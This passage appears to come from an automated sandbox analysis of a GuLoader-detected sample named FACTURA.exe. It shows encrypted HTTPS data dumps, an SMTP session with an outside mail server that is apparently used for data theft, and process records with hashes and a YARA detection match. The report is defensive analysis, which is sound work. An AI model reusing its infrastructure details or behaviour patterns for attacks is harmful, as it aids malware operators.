e3 5a 1c 56 d9 11 17 ac 98 6b 66 4a 8a e4 52 e2 c5 eb 76 7e 03 08 8c db ce 04 44 69 79 9b f0 db 34 b2 98 1e 5d ce ee 0d df
                                                          Data Ascii: .&*g}jP]7l2Y~%&bm )&u29k<:X~Y ] *_onZwQ!OLEVm%B:L^O9r[6\]P]8J[|5lM&GDIoTO_ZVkfJRv~Diy4]
                                                          2021-10-06 16:03:54 UTC200INData Raw: 6b 82 dc fe bf 24 94 fe 8d de 37 24 e3 c5 c0 14 dd 6f 0d e3 94 05 30 60 1c e3 38 0d a4 5c 80 de 50 ce 06 9c dd 2c 91 fb cc 71 7b f0 39 56 69 79 b4 75 e7 ab ec 2c da 50 95 e3 a9 3e 0c d0 62 a1 0d a3 67 9d 47 76 d6 46 eb aa 53 66 90 5b 70 c4 68 3b dd 87 de bc f3 3c 7e ea 54 cd 44 ee 5e 79 79 67 19 32 ad 81 1e db c8 a3 15 a4 ad 51 2a 22 73 7c 96 36 50 65 6b d3 84 ba 18 23 09 55 ec 37 6e a7 f1 02 a0 ca 0c 98 34 4c f2 3e c0 15 8c 99 95 d7 82 aa 68 46 1c 63 da 20 a1 93 96 c3 b5 65 9e 9d 92 de 81 8f 58 1d 44 9b de 08 72 ba e0 27 69 58 fa f6 99 96 b0 33 30 1c 9d 1f cb fb 6a 5c 0e 7a 0f f6 90 5e dc 04 3f 4b bd 8b 85 8b 36 e7 f9 d2 51 9b f6 52 4b aa 72 3b 36 6a f0 d0 3b 67 c7 b3 f5 3a dc ad 1c e7 b9 3d b7 b3 a6 75 14 5c 36 cc b3 a8 81 f7 3d 4c e3 52 c2 fc 71 eb 49
                                                          Data Ascii: k$7$o0`8\P,q{9Viyu,P>bgGvFSf[ph;<~TD^yyg2Q*"s|6Pek#U7n4L>hFc eXDr'iX30j\z^?K6QRKr;6j;g:=u\6=LRqI
                                                          2021-10-06 16:03:54 UTC201INData Raw: c8 f7 a0 52 53 82 23 2a d5 ff f2 9d 61 89 5d 53 7b 27 16 78 1c 05 0b b8 dd 8f 29 8b 9e 4f 77 bf 59 ee 4c c4 e9 af 01 9b 55 49 87 14 4f 89 d2 d7 4a 59 0c 4d 03 9e 3e eb eb 88 30 ab 30 1b 98 b9 50 d5 8d 52 dc dd 49 35 ba 71 19 f9 9b 05 5c c3 39 e8 a7 75 6c da b2 b4 b5 7e 9b 8c 43 c6 2b 8d bf ff 50 cf 5f 9e 9b 98 c8 0e 09 5e 39 d2 fe 02 7a c7 35 bb ee 5b a1 d3 b8 d5 f7 db 2c 1b 4e 78 10 e4 49 0e 8c b1 dc 06 d6 0b 47 bb 97 5d 80 08 a5 9c c0 c3 2c a8 f3 ae e6 e7 37 4e 54 ca 00 3a 8f 9c 19 44 55 ef e7 4b 87 a6 cb 03 76 1a 61 88 df c9 2f 49 78 70 93 97 c9 25 a3 c7 10 4c df c8 68 f0 3d 0c 74 9d e4 e1 e9 2e 40 7a ad 29 c7 8d 81 5f b8 a5 c3 f5 8c 74 03 df a7 ae 68 ba 0f 5e 93 58 ed ab bc 08 4a d3 b2 21 f1 8d 57 ff a7 07 3b 47 c5 8e 86 a2 9f 96 ee 82 e6 04 67 33 eb
                                                          Data Ascii: RS#*a]S{'x)OwYLUIOJYM>00PRI5q\9ul~C+P_^9z5[,NxIG],7NT:DUKva/Ixp%Lh=t.@z)_th^XJ!W;Gg3
                                                          2021-10-06 16:03:54 UTC203INData Raw: ed 69 ba 42 8b 7c 98 7f 6f dd 53 a4 97 57 68 99 77 66 c0 0d 0d db 81 dc 90 92 1c 74 bf 0b fb 44 d9 4f 74 7b 17 39 34 80 8e 6d ff 8c f0 33 bd ba 56 30 00 0b 5a 80 25 45 7c 61 f9 e5 a9 1c 04 22 63 e0 2a 6a d5 cd 1c b1 d0 00 97 44 5a d3 2b eb 30 ba 9e 84 cc 85 bd 1c 6b 1c 7a b4 2b ab 86 ad c3 b5 76 83 86 86 9a a3 99 4f 3f 5f 82 dc 00 69 b1 b0 06 7f 4d e7 ff 91 eb 96 34 37 06 93 72 ed ba 44 43 01 7b 1e d7 85 45 db 0f 3c 0e 91 81 b5 8a 30 e7 f8 db 51 99 fd 50 71 ac 6f 3c 58 5e 84 f1 27 6b d3 84 e8 3e c2 ab 6e dd b3 21 ad d6 99 2e 3e 2e 30 de ae 99 a5 83 1b 4f fd 7b d4 d6 79 9c 73 fc da 5b 7c 3a a6 bd a2 26 bf 05 08 32 ea eb 52 40 6a da d4 6a 8c 1a d0 c8 ca db c5 20 1d 5a f8 fa 0f c7 f2 d3 5a cd 7d f1 45 43 18 33 d0 b2 35 f4 d6 e8 71 32 5b 06 14 78 20 e0 ab 3c
                                                          Data Ascii: iB|oSWhwftDOt{94m3V0Z%E|a"c*jDZ+0kz+vO?_iM47rDC{E<0QPqo<X^'k>n!.>.0O{ys[|:&2R@jj ZZ}EC35q2[x <
                                                          2021-10-06 16:03:54 UTC204INData Raw: 2d fd 9a 52 c0 9c 45 8f eb 52 24 98 73 77 e8 9b 03 77 e3 25 8c aa 7a 51 cf b2 a8 92 7c e9 a2 50 cb 2f 9c a2 ac 43 d8 4e a0 b5 f7 e2 1b 08 78 39 d1 8b 34 6c c1 10 aa ee 7d af d3 c8 ed e6 d3 31 69 50 4e 10 c9 68 01 92 e3 de 10 cd 38 7d 8e 84 2f 92 00 d1 a4 e1 d9 00 ad c6 bc fb ea 2c 2b 41 af 27 00 ab be 07 4c 48 8d ea 47 f5 a1 f0 6a 77 00 04 9d ba e9 1f 4c 63 62 9b e5 ba 26 a5 98 3e 4a ba e6 00 d4 5c 3d 71 9b a3 c2 f1 08 5b 6d c0 6a d2 8d 94 74 9b 9c dd ff b5 68 13 df 87 b1 1a 9a 0d 3b a2 55 fc a3 a0 3f 6b c5 ab 30 f7 94 12 eb b8 68 2e 2a 96 b8 8b 9f 80 9c f0 95 ec 13 63 2d fe 53 aa ec 84 88 1e e2 a6 83 11 6b 4e e6 3a e7 e6 a5 af 1f e2 47 72 48 28 d6 33 a5 07 3d 31 1e e0 e0 09 40 f7 39 12 43 04 4a 53 2f bb 51 5c 3c ac 42 99 a6 1b 1c fc 47 0c 8e b6 47 b8 d2
                                                          Data Ascii: -RER$sww%zQ|P/CNx94l}1iPNh8}/,+A'LHGjwLcb&>J\=q[mjth;U?k0h.*c-SkN:GrH(3=1@9CJS/Q\<BGG
                                                          2021-10-06 16:03:54 UTC205INData Raw: 3c 08 0d 55 e0 2a 7a ce cb 02 b6 b9 08 9c 30 76 ff 31 d7 18 aa 89 82 f7 82 8a 04 6d 11 75 d8 03 be 97 80 f1 b5 7e 98 9d 86 de b5 8f 58 12 7f 9c cb 05 73 bb d5 1c 68 79 ff f5 9e a4 a8 0e 29 17 88 7e fc fd 68 42 1c 08 39 dc 97 58 d0 07 76 08 86 88 ba 9a 27 fa fe da 3f af 93 55 7d aa 5f 1f 39 75 99 ee 3b 68 f5 b2 f3 3c df ab 68 dd a3 1c a6 b2 a2 29 35 4d 23 d2 b5 a8 95 f7 3a 57 c4 77 c3 f5 45 9b 71 95 c9 71 78 11 9c ba a5 33 cb 1c 08 2c cb fc 6a 5e 1e d4 de 70 a0 5b db d9 f5 e1 fb 16 1d 58 e6 89 5c cf f4 cc 60 fa 46 f8 42 44 7c 1b c2 a8 76 de d8 9a 41 5d 1c 27 0f 31 08 ee cc 1f 5e 2f 6c 48 c2 f7 31 fb c8 a7 34 4d 57 6a e2 1e c2 20 7d 2c 17 78 37 b7 5c 2a f8 5d b1 50 bf c1 46 29 2b ab 05 29 4f 65 6a 7c cd a3 12 ea b0 d9 e0 6d 1e 4c d3 03 26 04 5d da 5f 4a f8
                                                          Data Ascii: <U*z0v1mu~Xshy)~hB9Xv'?U}_9u;h<h)5M#:WwEqqx3,j^p[X\`FBD|vA]'1^/lH14MWj },x7\*]PF)+)Oej|mL&]_J
                                                          2021-10-06 16:03:54 UTC207INData Raw: cd e3 30 0c 45 6a 03 f3 42 1b e1 e6 de 01 e1 38 62 8e 98 5b e1 36 c8 8f d5 f4 1f 96 c6 a1 e0 86 09 37 40 db 11 08 f1 b0 0a 4b 59 88 e0 4b e2 ab d2 03 4a 1a 0d aa d6 d8 1d 65 62 61 fe d6 ce 34 b6 fb 31 55 df cb 1c a6 19 17 6e 80 d1 eb f3 0a 51 71 b4 29 f8 85 99 44 91 af da fd ba 63 04 ab a5 a6 1c aa 2f 5a 93 5c f7 b6 d2 28 7c de 91 34 e6 85 39 ed ca 60 39 5e 9a 9e 8a bd 80 96 f4 84 8f 2e 76 1a e2 58 88 83 be 89 09 89 a4 92 20 46 70 e6 2b 86 ed 85 b5 24 fc 5d 76 44 39 a4 10 a5 10 0b 1f 10 f9 dd 18 30 f1 2e 07 68 3f 51 30 0d bd 50 5c 3f bd 30 bf b7 00 2d 94 6b 1f a3 b8 55 b3 cb ef 39 7b 98 00 d7 59 5e ae 29 ec b0 36 08 40 43 48 91 fb 9d e8 02 09 c0 2c d8 7d 73 c1 7f 2f d8 41 f2 7e 5b 58 4b 64 e7 54 dd 29 4f e4 25 43 88 43 92 5e 17 70 8b 3a d8 ed 51 9e 82 5f
                                                          Data Ascii: 0EjB8b[67@KYKJeba41UnQq)Dc/Z\(|49`9^.vX Fp+$]vD90.h?Q0P\?0-kU9{Y^)6@CH,}s/A~[XKdT)O%CC^p:Q_
                                                          2021-10-06 16:03:54 UTC208INData Raw: 33 38 02 92 66 88 f3 62 58 30 49 19 d6 81 41 d7 06 21 4b ae 81 a2 ba 3c eb f4 c0 25 b5 fd 41 59 ad 73 37 35 6f 9c fa 4e 62 d1 b3 d8 12 d6 ae 6e d1 b3 3d 85 b7 a6 32 3c 57 57 f6 af aa 92 9e 19 4f cf 1e ec fc 6f eb 5f 90 d2 5d 63 26 9a a5 b2 40 98 37 1e 3f cb e9 0b 7c 1f d3 c5 77 be 3e 92 ef e4 cc d5 05 1e 44 ec 9b 28 c1 fe d6 11 ff 41 eb 5d 56 08 28 c2 ae 46 98 fb 81 5c 3c 29 3b 7b 1f 00 fb f4 2e 74 35 6e 4b f6 fa 3a fb a1 97 2c 52 6e 6a e2 5f e4 30 10 0a 17 6e 56 91 4c 00 e5 46 b9 56 83 cb 58 20 4e be 13 5d 77 52 7b 44 c5 b4 10 f9 a7 ba e2 6c 3a 72 e2 03 3b 00 4a d6 59 40 f8 7f ed 0b 36 f2 b9 31 50 40 52 9b 78 4e 4c ba f7 4a b1 36 89 e6 2f ba 85 ed 08 73 7c 5f a8 49 c9 a3 0e 97 e0 f3 8b 8f 90 09 de 20 05 35 e0 2d dd 58 17 14 d8 f2 21 f0 9a 72 8e 71 0a 04
                                                          Data Ascii: 38fbX0IA!K<%AYs75oNbn=2<WWOo_]c&@7?|w>D(A]V(F\<);{.t5nK:,Rnj_0nVLFVX N]wR{Dl:r;JY@61P@RxNLJ6/s|_I 5-X!rq
                                                          2021-10-06 16:03:54 UTC209INData Raw: 91 ba 41 c5 18 c8 36 bf a5 68 bb 4e 1c 1d c9 a3 96 1d fa 31 1f c1 28 b2 81 f1 00 ff cd a1 96 df 0e 71 a5 cc c1 6f f5 7d 3a ef 28 19 67 d1 69 0b c7 c7 75 96 f2 3a 97 c8 02 7c 28 c4 d3 e3 cb f2 f2 92 fe 89 60 25 43 81 2d fc e8 d7 e6 73 80 c6 f7 54 0b bc 48 4d c7 81 d2 5b 85 a8 32 1e 27 43 a7 77 c0 78 44 5b 79 82 a1 ec fd 84 cb a2 25 eb ed 41 e6 27 31 2f 51 c8 22 78 0f 7a 6b fc 0a 7f 60 32 26 fd be ee 6e 95 19 45 94 3b 3a d6 58 cc f2 41 ef f8 28 29 f2 8a 78 4d 70 29 83 6e b8 84 d6 a6 3c 42 a9 b3 46 1c af 89 1b a7 40 30 a8 4f 8a 7b 4e 2d f9 30 c6 5e 49 12 d9 5c b8 87 13 6a 16 3c dc ee d7 6d 4a d1 d2 d4 fe f3 52 72 73 7f 63 42 96 09 e7 a8 95 d0 2c e2 9b fb 80 69 4b 82 a6 ab 68 e7 67 46 86 e2 5b 34 1a 6a a6 58 6d d2 b4 ef b7 42 1a 57 d4 eb 67 ed 19 aa 07 93 8f
                                                          Data Ascii: A6hN1(qo}:(giu:|(`%C-sTHM[2'CwxD[y%A'1/Q"xzk`2&nE;:XA()xMp)n<BF@0O{N-0^I\j<mJRrscB,iKhgF[4jXmBWg
                                                          2021-10-06 16:03:54 UTC210INData Raw: f4 76 bc 2b a3 0c 2c 4b 17 f9 9c 39 b5 1e 0b 64 e7 55 1e 4e c5 48 4d 4a af 96 a4 ef 63 bd b5 1c dd 55 ae 3d b4 b6 bd 66 75 2d 95 f2 54 b8 9f b0 3e 9b 28 99 33 3f 72 52 ad dd 23 b1 be eb 3c 4c da 7b 73 7d 45 8d a5 72 13 44 0f 25 a8 9c 4b 82 cf f1 4f 2c 46 07 92 22 f3 41 35 4e 74 05 39 eb 34 41 9e b4 11 3b e5 94 38 d9 be d7 6a 3b a8 d5 0c a3 7d d5 e4 5e cc 3a 5c 1b 27 3c 20 5b 56 6f 2d bf 2c 37 f0 28 b8 6b 5b 89 4c 95 56 0f 23 c5 2c be dc de 9b 21 cb 47 87 8f 58 e6 c2 9e 63 0a 0c 1e c4 32 3c 33 0d f0 85 9f dc ff e1 68 a9 40 ed dc 91 29 ae 3c 6b 53 ad 80 49 9d f5 1e ff 08 08 5e af 6d 4c cc e4 4a dd 8f 1a 6c 75 69 07 79 43 f9 c6 ac f7 e0 36 4b df 5c ab 0e 9a f4 da 0e 81 0d 2e 73 65 7f 15 71 5e 72 ca bf e6 4d 82 e4 2f 11 61 86 87 36 b9 bb ce 62 f9 3e 2a 8e 41
                                                          Data Ascii: v+,K9dUNHMJcU=fu-T>(3?rR#<L{s}ErD%KO,F"A5Nt94A;8j;}^:\'< [Vo-,7(k[LV#,!GXc2<3h@)<kSI^mLJluiyC6K\.seq^rM/a6b>*A
                                                          2021-10-06 16:03:54 UTC212INData Raw: ee 4e c6 ee 9f f8 92 62 2e 4f 84 34 de eb d5 f6 fd 69 cb f2 74 19 2d 0b 11 ef 81 c1 ca c0 4c 20 9d 7f 4b a3 73 c2 66 5c 54 76 8c b7 6e 2d 93 43 7b 27 63 32 54 65 fc 2a 3b d0 50 31 f6 da 7d 69 ff 1b ed 34 c5 a2 80 b7 ea 5c 15 ed c3 d5 32 3b dc 5f e2 e2 41 ed 74 2b 09 f3 89 78 4c 78 0f 82 6e ab 16 82 54 3f 6a ba 32 97 08 0f 59 08 35 14 cc ab 5d 0b 8b 54 b3 94 23 e1 59 52 98 19 4e 39 5d 1f ef eb 31 54 05 51 38 4e f9 cf db c3 f5 4a 6f 73 66 eb a5 a4 8b 07 bb 98 ca a4 2f 89 79 41 6f 42 83 a9 b4 7f a7 6a 4b 83 e3 48 4c 11 7b af 56 65 dd 30 e6 a4 55 86 57 c7 e0 78 7f 4c a5 15 13 8c dc 0b 20 10 c0 34 94 cd 92 c8 6f 2f 72 37 f4 4f 75 a3 03 d1 26 fa 10 e1 35 02 bd 25 cd e3 2c 33 f3 3a 1e b1 54 7e b8 68 33 fd 94 5e 33 de 4f 9e 3a 9b 32 0b 03 7b 50 41 f2 e2 65 b6 fe
                                                          Data Ascii: Nb.O4it-L Ksf\Tvn-C{'c2Te*;P1}i4\2;_At+xLxnT?j2Y5]T#YRN9]1TQ8NJosf/yAoBjKHL{Ve0UWxL 4o/r7Ou&5%,3:T~h3^3O:2{PAe
                                                          2021-10-06 16:03:54 UTC213INData Raw: a8 23 dc 72 50 f9 a5 6b 81 b9 f8 c6 53 66 35 cf 83 c2 a1 c0 fc 55 3b 23 0f 9d b2 77 4c 30 49 77 89 d2 ec 3c 56 0e 3d de 24 76 8d 24 5f 6e d8 64 ab f5 0e 1a 03 ad db 78 84 d9 b1 9d 15 52 3f 23 bf 57 7d 31 a3 35 31 f0 2a b8 6b 5b 83 c9 48 51 2a 3a c0 3d 3e 3f c3 9f 23 c4 41 91 8d 5f e4 d0 9b 62 05 0c 2b d6 a1 24 db 1c 71 c5 89 da f1 f0 09 bd 52 6e 54 8b ac 37 3c 71 ca e8 8e 46 8d ef 1c ef 1a 8b ce a7 76 c4 8c fc 46 cb 80 7a 6d 78 6e 0c 53 48 e5 c0 ab f9 f5 bd aa e9 49 3b 86 80 73 43 0d 9b 94 7e 6e 73 fe 8d 78 58 6a d8 39 77 45 99 78 6a 0d ee 06 8a 31 b3 3a 7b 61 97 3c 2a 89 41 ab bd 92 db 31 34 6d 2b 5c fc 63 8a 8b 6c c8 c7 22 de bd ca 2e 35 60 36 81 bc 29 d1 42 1d 0b 1f be 7f 1f 9a 59 82 f5 16 23 b2 d2 b8 c1 02 1a 6a 30 b1 49 78 71 aa 31 ac bb 5a f7 96 bd
                                                          Data Ascii: #rPkSf5U;#wL0Iw<V=$v$_ndxR?#W}151*k[HQ*:=>?#A_b+$qRnT7<qFvFzmxnSHI;sC~nsxXj9wExj1:{a<*A14m+\cl".5`6)BY#j0Ixq1Z
                                                          2021-10-06 16:03:54 UTC214INData Raw: dc 7a 73 f2 02 63 fd d9 3d d3 b7 e7 74 1d ee c0 f4 28 52 d6 55 f1 f1 5b 67 2d 0d 08 fa 96 cd 9f 6d 1c 90 ee 33 05 11 34 7b 5f a9 b2 12 0f 3d d9 49 29 87 40 b0 5e 17 84 48 2c f2 2e e5 56 4d 10 f7 42 b7 9b 83 aa ed 25 54 14 d0 7f 22 d1 d3 dd d6 fe 52 67 72 57 6b 58 b5 0c e6 b6 8c d6 2a fb 9c f9 83 6f 57 05 a4 a1 65 bd 63 56 94 62 d0 50 06 f8 e1 44 71 41 ac ef ab d1 db 5a d4 eb 67 f1 96 ab 07 93 de 4c 3f 26 1b c0 32 87 c6 92 cb 9a 0d f5 ed ef 55 fe 3d 06 de a2 a7 07 98 3e 0a aa a0 5c e2 2c 86 b7 3c 0c 22 28 73 a1 eb a6 ef 10 fe 19 d2 75 8c b2 95 35 19 10 72 5c df 5e e2 63 b0 f6 99 4e dd d8 32 4a 59 6f 25 f9 5d 39 09 13 8b ed cb 79 72 75 29 8d 48 0e ae b8 62 d8 bc 72 fc 58 3b 34 6a a8 66 b6 f0 fb 9d eb c1 66 17 61 95 2d 4d dc 73 b2 85 d3 96 6e f2 e7 5f 86 f7
                                                          Data Ascii: zsc=t(RU[g-m34{_=I)@^H,.VMB%T"RgrWkX*oWecVbPDqAZgL?&2U=>\,<"(su5r\^cN2JYo%]9yru)HbrX;4jffa-Msn_
                                                          2021-10-06 16:03:54 UTC215INData Raw: 5c ac e1 7f 4e 73 a9 1f 30 3c ea 47 96 64 52 95 df c9 10 3d a3 d4 33 22 3c d3 b1 24 d5 5a 9b 08 c6 e4 de 02 2d 0c 14 3b d1 32 3c 43 0f e2 04 c7 c6 7f 42 7d b4 40 05 4f 97 25 a0 2f e2 0b ba 01 58 91 f5 1e f2 01 0d 53 bb 61 58 c9 fd 4d cd 95 13 64 78 65 17 d3 9e cb c9 b7 f9 f1 2d d2 5e 4f 38 12 d2 e7 c8 8d 10 14 2c fa 21 6d 94 e8 44 ff 5b b6 fc c4 1a e5 24 0d f2 9a cf 37 bc a8 5b e2 f6 29 36 07 c2 37 e1 9d ae 24 2b 64 03 71 e6 7f 1f 08 e3 57 e6 30 42 ef 5f ad 91 fe 38 9a bb ba c9 da 0e 98 de eb 63 82 1f 56 9e 69 53 31 b3 ce df da 1d 95 dd b0 ff 55 f7 c2 c5 39 be 32 e2 f8 bc 88 66 68 1e dd 3a 8a 75 88 f3 73 dd 1d a7 c1 ac 39 d8 9c b8 4d 75 39 25 76 17 1d 7d 60 f1 b5 71 23 65 19 82 fe 28 e5 77 90 f5 b7 82 7b fb 83 cf 86 ff 5f 6e 32 bd 41 6b d9 dd 69 37 0d e1
                                                          Data Ascii: \Ns0<GdR=3"<$Z-;2<CB}@O%/XSaXMdxe-^O8,!mD[$7[)67$+dqW0B_8cViS1U92fh:us9Mu9%v}`q#e(w{_n2Aki7
                                                          2021-10-06 16:03:54 UTC217INData Raw: de 8b 1e fe 5d ab 09 e7 e2 e6 0d 5c 05 53 88 4d de cc c1 5f 81 52 67 56 76 79 c4 c7 18 67 c4 96 f8 25 e5 89 78 f0 61 42 85 b3 29 ba b2 6a 63 86 f1 c9 91 12 59 a0 50 71 40 f5 e8 be 51 86 40 5a 2d 6f df 9b a2 1b 1a 96 56 76 2b 1d ce 38 87 c6 8b 4c b5 2c 70 be fd 67 7d a5 15 4e 7e ef 13 dc 31 1e aa a2 6c e6 1e 07 e5 b1 b7 aa 48 7f bd 6a 2e ec 10 ee 07 d4 40 9c 31 81 25 97 d6 6f 48 5a ee f2 ec 5f f6 b7 47 c2 5e d9 56 c7 ee 23 e2 45 33 1b 00 8a e0 c6 77 62 fc c6 87 4b 8b f2 b6 05 d4 39 8f f1 58 35 aa 57 bc 54 dd e5 fa bb fd 4e c5 2f 74 0e a1 5e 4f 6b f3 9e cf 19 f9 ee fb dc c8 e2 22 43 2a e0 29 f4 0e d1 b8 5d 08 36 9d 87 ff cd d9 4f 44 71 e7 1c 9d 85 86 89 6e 06 62 a2 c4 2e b7 64 49 c8 94 e2 f6 fe 56 0f 0a a9 57 dc 91 24 16 ce 08 41 58 0a f2 91 cf e4 a4 c9 97
                                                          Data Ascii: ]\SM_RgVvyg%xaB)jcYPq@Q@Z-oVv+8L,pg}N~1lHj.@1%oHZ_G^V#E3wbK9X5WTN/t^Ok"C*)]6ODqnb.dIVW$AX
                                                          2021-10-06 16:03:54 UTC218INData Raw: 71 a8 af 48 b0 e8 6c fa 7f 0a 20 a6 4a 45 b8 e0 20 c5 f7 13 0a 65 0e 05 3a 4b 97 ce cb f7 96 3f 3c c7 3b 2a e7 92 97 da 7e 89 3b 3e 18 61 10 14 14 56 50 ca dc ee 2d 8b 8a 2a 77 e0 35 8f 4b a1 d5 db 01 fe 44 24 f5 53 45 fd ea b2 5c 29 00 23 04 fb 43 9f f6 ed 23 c6 57 5f d2 df 48 b4 96 37 fd a9 59 50 a9 1c 76 9e 89 71 70 86 32 8c 9a 13 10 ae f9 d1 fa 13 ae cf 1f bf 68 f9 ff ac 50 bd 55 ff 84 98 a2 6b 0a 0c 35 a3 e5 67 3a b3 54 cf b1 3e f0 be 96 98 a6 b6 6d 69 04 2b 4a 96 1a 6f cf b1 c1 63 cb 54 7b eb fe 28 e4 78 a0 e7 ad b9 7b fb 83 ce 96 8e 52 49 30 bd 11 6d c2 ef 0e 2c 3f ea 8d 3a 9b d7 cf 1e 0e 64 66 e7 b4 af f3 e5 02 07 97 85 3a a4 cb 8a d9 d4 a8 24 c9 80 5b 6b 16 e7 ad 8c 93 75 b5 2e ce 3b 21 d9 e7 83 1b de 2d 25 d7 11 62 28 27 d1 ea 40 6d ba 40 24 85
                                                          Data Ascii: qHl JE e:K?<;*~;>aVP-*w5KD$SE\)#C#W_H7YPvqp2hPUk5g:T>mi+JocT{(x{RI0m,?:df:$[ku.;!-%b('@m@$
                                                          2021-10-06 16:03:54 UTC219INData Raw: 87 40 b3 f8 75 e2 84 be 17 1a 9e 5d 58 20 01 c5 2d 8c c6 84 4f bd 23 f7 ff e8 2e 62 b8 1a d0 3e e5 1c fc 33 11 a5 24 d8 e6 23 02 f8 35 19 be 6d 60 aa f4 a1 97 8f 53 06 c0 7d 9c 3a 9c 34 0a 1b 7a 48 40 ea fd 68 ba f8 86 c7 cc db c7 bb ba 8c 3d ec 55 31 15 0a 9d e5 ce 79 74 76 27 85 59 0d ab a4 6c c5 bd 69 e8 c5 09 b2 3b b4 74 df e9 f7 99 ec cd 6d 05 70 16 b6 4e c6 f2 f6 91 dc 12 ff eb fd d7 e6 e9 2d 50 33 ef ad 74 03 d8 b7 50 04 3c 91 98 f4 ce d1 53 d8 36 f9 0c 88 87 06 3f 6d 0f 6d a6 ea 3d 35 8a 50 4c e9 e6 d8 ee c4 6e 99 b1 57 cd 12 76 1e de 03 5c 50 05 f8 80 49 04 bc ce 87 51 b3 d8 9e b1 d1 ca da de ca 5b 58 2e 57 bb da c6 f8 f6 69 22 b6 4a af 84 41 99 7c 8c f3 51 66 20 8d b6 ae 30 bf 27 02 25 fa ec 57 41 1d ce b0 37 d2 5b 98 da b9 db 89 06 17 1d f5 d7
                                                          Data Ascii: @u]X -O#.b>3$#5m`S}:4zH@h=U1ytv'Yli;tmpN-P3tP<S6?mm=5PLnWv\PIQ[X.Wi"JA|Qf 0'%WA7[
                                                          2021-10-06 16:03:54 UTC221INData Raw: 8f 5e a1 d7 db 16 fe 34 24 f1 53 68 fd c1 b2 4e 29 08 23 3b fb 0c 9f c3 ed 27 c6 7f 5f a8 df 79 b4 a8 37 ce a9 7a 50 b1 1c 7d 9e 8b 71 72 86 05 8c 8a 13 75 ae 95 d1 8d 13 f7 cf 68 bf 1d f9 95 ac 61 bd 7e ff bd 98 c7 6b 3c 0c 17 a3 c6 67 40 b3 48 cf f9 3e b8 be dd 98 92 b6 43 69 1f 2b 66 96 2d 6f ad b1 de 63 c5 54 6a eb 9a 2f a2 65 ca fb d5 b7 0a ff d1 cf fd 86 3d 4e 5b af 00 65 df fd 4b 25 38 ef f9 26 ae c5 a7 03 5d 77 13 ef d3 bd 17 00 65 15 90 97 db 40 bb 98 1f 38 d3 a5 04 a6 39 79 76 e9 c2 84 f0 67 51 1f c0 29 d6 e8 b7 00 bf cc d8 90 b4 0d 3b ab a3 c3 32 f5 09 3b ae 39 cc c2 97 6f 48 aa 80 55 d5 e0 3d 99 ae 07 29 2a b4 dd ad cf 90 f3 d0 f0 da 67 7f 5f e0 3c 81 ec 91 e7 38 89 86 f7 10 19 77 89 00 e7 c0 c0 90 40 e1 32 56 2a 63 a4 12 c0 1c 54 39 7f 8c b3
                                                          Data Ascii: ^4$ShN)#;'_y7zP}qruha~k<g@H>Ci+f-ocTj/e=N[eK%8&]we@89yvgQ);2;9oHU=)*g_<8w@2V*cT9
                                                          2021-10-06 16:03:54 UTC222INData Raw: 37 17 1e 67 4d 5d ef e0 6d be fe 97 46 d0 df 38 44 45 73 39 e5 55 31 15 0e 97 e5 ce 79 70 7d 27 85 59 09 a7 a4 6c c5 b9 6f f9 44 29 b6 5f b4 74 df ed e7 be ec cd 68 02 73 14 b4 4c ce f2 f2 90 c1 17 f7 f3 f5 de c6 ea 2c 4d 36 f2 a8 69 06 df b0 55 06 3e 93 9a fc c5 c4 41 59 72 fa 1f 88 94 07 2c 6f 08 6a a5 e4 2c b5 6a 58 4b e9 e4 d6 ff 44 8e 97 b5 51 dc 93 26 18 de 00 52 58 0d f0 83 4e 05 b4 c7 87 53 b2 ca 1c b4 c0 4e c3 d6 cb 5b 50 2e 57 bb da c6 e6 f7 69 23 b6 1e ad 92 16 eb 1d fc bd 3e 08 65 f5 d5 cb 40 cb 4e 6d 4b ae 84 25 2e 6a bd b1 1e d3 5b bc bc 81 be bc 64 72 2d 96 fa 5c a8 91 b8 3f b9 2e 99 30 37 7c 5c a7 dc 35 b6 b9 e8 32 5d 5b 42 7b 78 65 8f ab 7a 1b 41 0f 27 a6 92 43 88 c8 f4 4d 3e 23 0f 8f 30 96 49 10 49 65 0b 37 e5 29 44 8c
                                                          Data Ascii: 7gM]mF8DEs9U1yp}'YloD)_thsL,M6iU>AYr,oj,jXKDQ&RXNSN[P.Wi#>e@NmK%.j[dr-\?.07|\52][B{xezA'CM>#0IIe7)D


                                                          SMTP Packets

                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Oct 6, 2021 18:05:29.522721052 CEST58749822109.169.39.245192.168.11.20220-s3.xperimenta.net ESMTP Exim 4.91 #1 Wed, 06 Oct 2021 18:05:29 +0200
                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                          220 and/or bulk e-mail.
                                                          Oct 6, 2021 18:05:29.523228884 CEST49822587192.168.11.20109.169.39.245EHLO 247525
                                                          Oct 6, 2021 18:05:29.542480946 CEST58749822109.169.39.245192.168.11.20250-s3.xperimenta.net Hello 247525 [84.17.52.7]
                                                          250-SIZE 94371840
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-AUTH PLAIN LOGIN
                                                          250-STARTTLS
                                                          250 HELP
                                                          Oct 6, 2021 18:05:29.542747021 CEST49822587192.168.11.20109.169.39.245STARTTLS
                                                          Oct 6, 2021 18:05:29.569701910 CEST58749822109.169.39.245192.168.11.20220 TLS go ahead

                                                          Code Manipulations

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:18:03:06
                                                          Start date:06/10/2021
                                                          Path:C:\Users\user\Desktop\FACTURA.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\FACTURA.exe'
                                                          Imagebase:0x400000
                                                          File size:102400 bytes
                                                          MD5 hash:5086ECEA441041D6101CF29FAF76659D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Visual Basic
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.67798697025.00000000022D0000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Start time:18:03:30
                                                          Start date:06/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Users\user\Desktop\FACTURA.exe'
                                                          Imagebase:0x400000
                                                          File size:65440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
